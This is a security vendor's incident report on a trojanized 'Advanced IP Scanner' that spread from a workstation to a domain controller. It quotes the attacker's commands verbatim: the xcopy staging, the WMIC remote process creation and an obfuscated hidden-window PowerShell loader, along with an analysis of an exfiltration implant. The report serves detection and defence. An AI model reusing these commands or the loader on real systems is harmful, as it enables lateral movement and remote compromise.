On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and copying the behavior over to the server {DomainController2}. Via the attacker, the malicious application also began setting up a Command & Control session with an IP address hosted at CloudFlare.
Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.
Time: 18:57 UTC
Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery
Activity #1: – TOMSMITH mistakenly downloaded malicious software on hostname1. This malicious software masked itself as Advanced IP Scanner in Google search results, and resulted in the user navigating to a fake version of this software hosted in a Cloudflare instance. The logs show the installation of this program onto hostname1 as well. Important artifacts created around this time are:
C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t
Time: 18:59 UTC
Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we do still see the value in detecting an early stage reconnaissance, as correlated activity could be early warning signs of an attack.
Time: 19:06 UTC
Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery
Activity #3: Administrator runs several commands to gather information about the AD domain.
"C:\WINDOWS\system32\nslookup.exe" internaldomain.local C:\WINDOWS\system32\systeminfo.exe"
Time: 19:06 UTC
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #4: When the Advanced_IP_Scanner_2.5.4594.1.exe is run we can see the LOLBAS mentioned in an attack here in action. The following two commands directly afterwards show us building the DLL, and then calling the script.
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline" C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"
Time: 19:07 UTC
Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging
Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.
"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y
Time: 19:08 UTC
Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation
Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.
"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"
Time: 19:08 UTC
Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.
Time: 19:09 UTC on DomainController2
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #8: Now that the attacker had an available remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs following powershell script.
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable _).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"
To break this down a little:
1. This part runs PowerShell with a hidden window, which is often a tactic used by malicious scripts to hide their activity from the user:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden
2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.
Set-Item Variable:LeX 'Net.WebClient'
3. This sets another variable, /8i, to a specific file path.
Set-Item Variable:/8i
'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t'
4. This seems to list items in the current directory with names starting with an underscore.
ls _-*
5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.
Time: 19:10 UTC
Mitre Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #9: We then see a batch script file running from that same directory.
"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
Time: 19:10 UTC
Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.
We were also given a copy of both the CG6oDkyFHl3R.t and LogConverter.bat from the customer. The .t file was a C# application and here is a breakdown of its key functionalities:
An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.
Time: 22:16 UTC
Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2 and we updated the previously created finding with new information.
Time: 22:53 UTC
Activity #12: Customer contacts our support team.
Time: 23:37 UTC
Activity #13: Support team begins investigation.
Time: 01:54 UTC
Activity #14: The customer manually isolates the hosts using Blumira Agent.
Time: 14:13 UTC
Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.
Time: 15:27 UTC
Activity #16: 2 files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.
In this specific instance there are several different defensive recommendations from the Blumira team.
There is no unhackable company, software, hardware, or person. I recently had a discussion the other day on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything, it’s just not possible.What is possible, is the ability for us to grow and learn over time and accept that is something that we should constantly be doing. So what could we have done better in this situation?
These detections were possible with the installation of either our Blumira Agent or sysmon, however the admin was able to quickly identify and quarantine these hosts with the Blumira Agent. Thanks to the quick actions from both teams, there was no downtime or further remediation needed.
As this incident demonstrates, early detection and proactive security measures are crucial in preventing threat actors from establishing footholds in your environment. If you're looking for others way to improve your security posture, consider the free Blumira Domain Security Assessment. This new tool provides a comprehensive view of your publicly accessible assets and potential security gaps in minutes - no strings attached. Request your free assessment here.